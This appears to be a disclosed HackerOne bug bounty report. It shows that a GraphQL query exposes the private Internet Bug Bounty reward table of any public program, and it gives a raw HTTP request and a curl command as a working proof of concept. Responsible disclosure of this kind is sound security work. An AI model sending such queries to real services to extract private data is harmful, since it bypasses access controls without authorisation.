HackerOne: Being able to disclose IBB bounty table of any public program

Summary:

Hi there, I hope you are doing well :)

According to https://docs.hackerone.com/en/articles/8496298-internet-bug-bounty

██████

It says “You can opt-in by setting up your bounty table on your main program’s rewards settings page (instructions below). This bounty table is private and indicates how much you will award for vulnerabilities discovered in open-source projects”

Which means the IBB bounty table is private but i was able to disclose IBB bounty table

Steps To Reproduce

1. Send this HTTP request:

POST /graphql HTTP/2
Host: hackerone.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json
Content-Type: application/json
Content-Length: 157
Te: trailers

{"query":"{\r\n  team(handle: \"security\") {\r\n\r\nibb_bounty_table {\r\n      critical\r\n      high\r\n      medium\r\n      low\r\n    }\r\n}\r\n}\r\n"}

OR

run this curl command :

curl -i -s -k -X $'POST' \
    -H $'Host: hackerone.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'Content-Length: 157' -H $'Te: trailers' \
    --data-binary $'{\"query\":\"{\\r\\n  team(handle: \\\"security\\\") {\\r\\n\\r\\nibb_bounty_table {\\r\\n      critical\\r\\n      high\\r\\n      medium\\r\\n      low\\r\\n    }\\r\\n}\\r\\n}\\r\\n\"}' \
    $'https://hackerone.com/graphql'

it will disclose IBB bounty table of Hackerone:

█████

Impact

Private information disclosure